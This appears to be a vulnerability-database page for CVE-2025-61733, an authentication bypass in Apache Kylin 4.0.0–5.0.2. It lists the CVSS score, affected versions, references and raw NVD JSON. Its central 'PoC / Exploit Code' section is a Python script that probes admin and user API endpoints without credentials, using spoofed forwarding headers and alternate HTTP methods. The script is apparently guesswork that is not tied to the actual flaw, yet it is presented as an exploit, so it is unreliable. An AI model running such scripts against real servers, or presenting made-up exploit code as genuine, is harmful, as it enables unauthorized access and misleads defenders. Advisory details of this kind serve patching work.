CVE-2025-61733

Description

Authentication Bypass Using an Alternate Path or Channel vulnerability in Apache Kylin. This issue affects Apache Kylin: from 4.0.0 through 5.0.2. Users are recommended to upgrade to version 5.0.3, which fixes the issue.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:* - VULNERABLE

Apache Kylin >= 4.0.0

Apache Kylin <= 5.0.2

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61733 PoC - Apache Kylin Authentication Bypass
# This PoC demonstrates how an attacker can bypass authentication
# in Apache Kylin versions 4.0.0 through 5.0.2

import requests

# Target Apache Kylin server
TARGET_URL = "http://target-kylin-server:7070"

# Step 1: Try accessing a protected endpoint without authentication
# Using an alternate path/channel that bypasses authentication
def exploit_auth_bypass(target_url):
    """
    Exploit authentication bypass vulnerability in Apache Kylin.
    The vulnerability exists due to missing authentication checks
    on certain API endpoints or alternate paths.
    """
    
    # List of potential bypass endpoints commonly found in Kylin
    bypass_endpoints = [
        "/kylin/api/admin/config",
        "/kylin/api/user/list",
        "/kylin/api/projects",
        "/kylin/api/cubes",
        "/kylin/api/models",
        "/kylin/api/jobs",
        "/kylin/api/tables",
        "/kylin/api/diag",
        "/kylin/api/system/info",
        "/kylin/api/version",
    ]
    
    headers = {
        "User-Agent": "Mozilla/5.0 (compatible; SecurityResearcher)",
        "Accept": "application/json",
        # Attempt to bypass auth using alternate headers or methods
        "X-Requested-With": "XMLHttpRequest",
        "X-Forwarded-For": "127.0.0.1",
        "X-Real-IP": "127.0.0.1"
    }
    
    for endpoint in bypass_endpoints:
        url = f"{target_url}{endpoint}"
        try:
            # Attempt access without any authentication credentials
            response = requests.get(url, headers=headers, timeout=10)
            
            if response.status_code == 200:
                print(f"[+] Bypass successful at: {url}")
                print(f"[+] Response: {response.text[:500]}")
                return True
            elif response.status_code == 401 or response.status_code == 403:
                print(f"[-] Auth required at: {url} (Status: {response.status_code})")
            else:
                print(f"[?] Unexpected response at {url}: {response.status_code}")
        except requests.exceptions.RequestException as e:
            print(f"[!] Error connecting to {url}: {e}")
    
    return False

# Step 2: Attempt method-based bypass
def method_bypass(target_url):
    """
    Try different HTTP methods that might bypass authentication filters.
    """
    url = f"{target_url}/kylin/api/admin/config"
    methods = ['GET', 'POST', 'PUT', 'OPTIONS', 'HEAD', 'PATCH']
    
    for method in methods:
        try:
            response = requests.request(method, url, timeout=10)
            if response.status_code == 200 and method in ['OPTIONS', 'HEAD']:
                print(f"[+] Method bypass successful: {method} {url}")
                return True
        except:
            pass
    return False

if __name__ == "__main__":
    print(f"[*] Targeting: {TARGET_URL}")
    print("[*] Attempting authentication bypass...")
    
    if exploit_auth_bypass(TARGET_URL):
        print("[+] Vulnerability confirmed - authentication bypass successful!")
    else:
        print("[-] Could not confirm vulnerability")
    
    print("[*] Trying method-based bypass...")
    method_bypass(TARGET_URL)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61733
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61733
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61733/
[4] VulDB https://vuldb.com/cve/CVE-2025-61733
[5] https://lists.apache.org/thread/8wmcffly6gp50nmfw8j4w3hlmv843yo0
[6] http://www.openwall.com/lists/oss-security/2025/09/30/7

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61733", "sourceIdentifier": "[email protected]", "published": "2025-10-02T10:15:39.930", "lastModified": "2025-11-04T22:16:36.827", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Authentication Bypass Using an Alternate Path or Channel vulnerability in Apache Kylin.\n\nThis issue affects Apache Kylin: from 4.0.0 through 5.0.2.\n\nUsers are recommended to upgrade to version 5.0.3, which fixes the issue."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-288"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:apache:kylin:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.0.0", "versionEndExcluding": "5.0.3", "matchCriteriaId": "0732C89B-68F0-406A-977F-C75F554B17DD"}]}]}], "references": [{"url": "https://lists.apache.org/thread/8wmcffly6gp50nmfw8j4w3hlmv843yo0", "source": "[email protected]", "tags": ["Issue Tracking", "Vendor Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2025/09/30/7", "source": "af854a3a-2127-422b-91ae-364da2661108"}]}}